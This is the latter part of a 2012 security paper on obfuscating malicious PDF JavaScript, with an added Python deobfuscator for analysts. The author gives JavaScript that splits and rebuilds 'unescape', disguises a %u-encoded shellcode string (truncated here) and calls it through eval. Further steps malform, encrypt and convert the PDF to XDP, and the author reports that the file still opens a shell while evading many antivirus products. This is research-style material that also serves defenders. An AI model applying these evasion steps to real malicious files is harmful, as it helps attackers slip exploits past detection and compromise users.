(source: author created)
The image above shows the PDF file after modification. To begin, note the
conditional added uses the app object to request the viewerType. If it does not
return “Reader” the variables that follow will not be declared. Next, the unescape
function was removed from the FqCieFYnJBSPYM variable assignment. Removing
the string “unescape” is often an easy way to lower antivirus detection. To prevent
serial analysis from continued detection, unescape was split into separate two-letter
variables along with the number 1 and non-linear placement. Replace was
then used to clean up the string as it was put into variable ‘g’.
var a = 'u1n';
var b = 'e1s';
var c = 'pe1';
var e = '1ca';
var f = a + b + e + c;
var g = f.replace(/1/g,"");
To break up the Unicode string into gibberish, I both split it into two parts
and replaced all instances of ‘u’ with ‘fud’.
var h = "%fudb148%fud861c%fudfed3%fudc7c6%fudd2c1%fudb4d4%fud8d27%fud19b8%fudebf6%fudf831%fud737a%fud1d72%fud93b7%fud4049%fudf530%fud9bb9%fud4634%fud912c …;
var i = "%fud7549%fud974a%fudb3be%fudbba8%fud2847%fud7ffc%fud0573%fud424f%fudb5b8%fudb299%fud043c%fud71…;
Next, to remove ‘fud’ to return to a usable string, I performed another
replace operation and then put the string back together.
var j = h.replace(/fud/g,"u");
var k = i.replace(/fud/g,"u");
var l = j + k;
Finally, because ‘unescape’ is currently a static variable and not a function,
we need to use the eval operation to call it as a function. To do that, we need to
concatenate the variables:
var z = g + "('" + l + "');";
and then eval() into FqCieFYnJBSPYM
var FqCieFYnJBSPYM = eval(z);
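The split, replace and eval steps above can be reversed statically by propagating string constants, which is how an analyst or scanner recovers the hidden call without running the script. This Python example is added here and is not part of the paper; it handles only literal concatenation and literal .replace() calls, and the two payload strings in the sample are constructed placeholders.

```python
import re

IDENT = r"[A-Za-z_$][\w$]*"
STRING = r"'[^'\\]*'" + "|" + r'"[^"\\]*"'
ASSIGN_RE = re.compile(r"^\s*(?:var\s+)?(%s)\s*([-+*/]?=)(?!=)\s*(.+?);\s*$" % IDENT)
TERM_RE = re.compile(r"\s*(%s|%s)\s*(?:\+|$)" % (STRING, IDENT))
REPLACE_RE = re.compile(
    r"^(%s)\.replace\(\s*/((?:[^/\\]|\\.)+)/(g?)\s*,\s*(%s)\s*\)$" % (IDENT, STRING))
EVAL_RE = re.compile(r"\beval\(\s*(%s)\s*\)" % IDENT)

def evaluate(expr, env):
    """Return the string value of a constant expression, or None if unknown."""
    m = REPLACE_RE.match(expr)
    if m:
        base, repl = env.get(m.group(1)), m.group(4)[1:-1]
        if base is None:
            return None
        try:  # simple JS patterns such as /1/g and /fud/g are valid Python regexes
            return re.sub(m.group(2), lambda _: repl, base, count=0 if m.group(3) else 1)
        except re.error:
            return None
    parts, pos = [], 0
    while pos < len(expr):
        t = TERM_RE.match(expr, pos)
        if t is None:
            return None
        token = t.group(1)
        value = token[1:-1] if token[0] in "'\"" else env.get(token)
        if value is None:
            return None
        parts.append(value)
        pos = t.end()
    return "".join(parts)

def resolve_eval_arguments(js):
    """Statically recover the strings that the script passes to eval()."""
    env, reached = {}, []
    for line in js.splitlines():
        call = EVAL_RE.search(line)
        if call and call.group(1) in env:
            reached.append(env[call.group(1)])
        a = ASSIGN_RE.match(line)
        if a:
            name, op, expr = a.groups()
            value = evaluate(expr.strip(), env) if op == "=" else None
            if value is None:
                env.pop(name, None)  # no longer a known constant
            else:
                env[name] = value
    return reached

# Constructed sample modelled on the snippet above; h and i are placeholders.
SAMPLE_JS = """\
var a = 'u1n';
var b = 'e1s';
var c = 'pe1';
var e = '1ca';
var f = a + b + e + c;
var g = f.replace(/1/g,"");
var h = "%fud0041";
var i = "%fud0042";
var j = h.replace(/fud/g,"u");
var k = i.replace(/fud/g,"u");
var l = j + k;
var z = g + "('" + l + "');";
var FqCieFYnJBSPYM = eval(z);
"""
```

Signatures applied to the recovered string see the plain call and its %u-encoded argument again, so the keyword-based detection that the split was meant to avoid applies once more.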
To make the file slightly malformed, I changed the %PDF-1.5 header to %PDF-8.31337
(source: author created)
and removed two endstream markers:
(source: author created)
Lastly, I encrypt the file:
(source: author created)
And then convert it to xdp:
(source: author created)
The resulting file still works to provide a shell on my target system:
(source: author created)
But is not detected as malicious by a large number of antivirus vendors.
4. Conclusion
We have explored a variety of methods to obfuscate malicious intent.  While each 
method offers value, combining them in creative ways provides an attacker additional 
options to circumvent detection.  An understanding of common obfuscation techniques 
provides a foundational understanding of techniques that allow greater flexibility 
regarding attack customization.   Also, from the defensive perspective, understanding the 
layers of obfuscation in use by attackers helps develop more successful mitigation 
strategies.  
“Be extremely subtle, even to the point of formlessness. Be extremely mysterious,
even to the point of soundlessness. Thereby you can be the director of the
opponent’s fate.”
--Sun tzu, Art of War
5. Appendix
A
(Source: )
B
(Source: )
6. References
Avast! (n.d.). Retrieved from https://blog.avast.com/2011/04/22/another-nasty-trick-in-malicious-pdf/
Internet Engineering Task Force. (n.d.). RFC 3548. Retrieved from
jeresig. (n.d.). Retrieved from
JSF*ck. (n.d.). Retrieved from
jsunpack. (n.d.). Retrieved from
dec/go?report=3834e056b7d8a6659cc5fb166e3e3b8d4867c0d9
Kahu Security. (n.d.). JS Obfuscation Using UserAgent String. Retrieved from
http://www.kahusecurity.com/2012/js-obfuscation-using-useragent-string/
Microsoft. (n.d.). Retrieved 08 10, 2012, from microsoft.com:
%28v=vs.94%29.aspx
Porst, S. (n.d.). How to really obfuscate your PDF malware. Retrieved from
http://storage.zynamics.com/files/blog/pdf_malware.pdf
SANS. (n.d.). JavaScript obfuscation in PDF: Sky is the limit. Retrieved from
Sophos. (n.d.). PDF malware adopts another obfuscation trick in attempt to avoid
detection. Retrieved from http://nakedsecurity.sophos.com/2012/04/05/ccittfax-pdf-malware/
Symantec. (n.d.). Retrieved from
Trend Micro. (n.d.). Retrieved from
content/us/pdfs/security-intelligence/white-papers/wp_trends-in-targeted-attacks.pdf
Trend Micro. (n.d.). Retrieved from http://blog.trendmicro.com/pdf-exploit-becomes-a-little-sophisticated/
w3schools. (n.d.). Javascript eval() Function. Retrieved from
Wikipedia. (n.d.). Retrieved from hexadecimal:
Wikipedia. (n.d.). Retrieved from Base64:
Wikipedia. (n.d.). ASCII. Retrieved from
Wikipedia. (n.d.). Bitwise Operation. Retrieved from
Wikipedia. (n.d.). Positional Notation. Retrieved from
Wolf, J. (n.d.). OMG WTF PDF. Retrieved from Fireeye:
http://blog.fireeye.com/files/27c3_julia_wolf_omg-wtf-pdf.pdf
Last Updated: December 14th, 2012